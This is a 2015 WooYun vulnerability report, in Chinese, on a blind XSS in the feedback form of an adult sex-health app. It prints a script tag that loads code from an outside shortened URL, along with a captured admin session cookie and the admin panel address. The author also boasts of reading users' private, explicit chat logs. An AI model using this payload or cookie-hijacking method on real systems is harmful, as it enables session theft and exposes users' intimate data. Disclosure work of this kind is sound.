当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144038

漏洞标题:性好手机成人APP某处盲打成功进入后台(泄露大量用户私密聊天记录)

相关厂商:性好社区

漏洞作者: Hackshy

提交时间:2015-09-29 16:10

修复时间:2015-11-13 16:12

公开时间:2015-11-13 16:12

漏洞类型:xss跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

性好成人两性健康社区与情趣用品应用APP....装在手机的APP嘛,你们懂的,

详细说明:

打开官网,瞬间就不淡定了。

9EL%HOOAM{6SCXGE1SHEG{V.png

进入正题,性好手机APP意见反馈处可提交XSS代码

<script src=http://is.gd/WZcXwJ></script>

,成功进入后台后,大量用户聊天记录,露骨信息都可以查看到,看了一眼,叔叔睡不着了。

`08@J~GP[SM23UXA3K2H`%V.png

X6`2Q092WAJ0CAKPCB0O_@1.jpg

还可以添加商品什么的

Y4OH``J`4U{KY(8)JG9JXDX.jpg

漏洞证明:

MBB(R`$H0~$E39[`L[5S0RX.png

WSLORH@_A@SMCJ[]J`Q%3AV.png

后台地址:

http://toy.xxuuoo.com/admin/main


快递内容:

2015-09-29 11:14:57	
location : http://toy.xxuuoo.com/admin/feedbacklist
toplocation : http://toy.xxuuoo.com/admin/main
cookie : PHPSESSID=qavp7od5fv9alikqjmm9fstqm6; lzstat_uv=1246865209742464134|878758; PHPSESSID=86g58bg807m0dq27b69ablef43
opener :
HTTP_REFERER : http://toy.xxuuoo.com/admin/feedbacklist
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.3; GWX:QUALIFIED; ASU2JS)
REMOTE_ADDR : 171.108.66.26

修复方案:

过滤一下或者访问限制。

版权声明:转载请注明来源 Hackshy@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2015-09-29 16:30 | 暴走 ( 普通白帽子 | Rank:282 漏洞数:62 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    被吸进进来了...反正我没装

  2. 2015-09-29 16:36 | Hackshy ( 路人 | Rank:28 漏洞数:17 | 猪猪侠爱吃棒棒糖)

    @暴走 内容很黄很暴力。

  3. 2015-09-29 16:43 | 暴走 ( 普通白帽子 | Rank:282 漏洞数:62 | Wooyun的Rank获取如同Dota冲天梯有过之而无...)

    @Hackshy 私密聊天记录都被你看到了,厂商肯定不高兴了。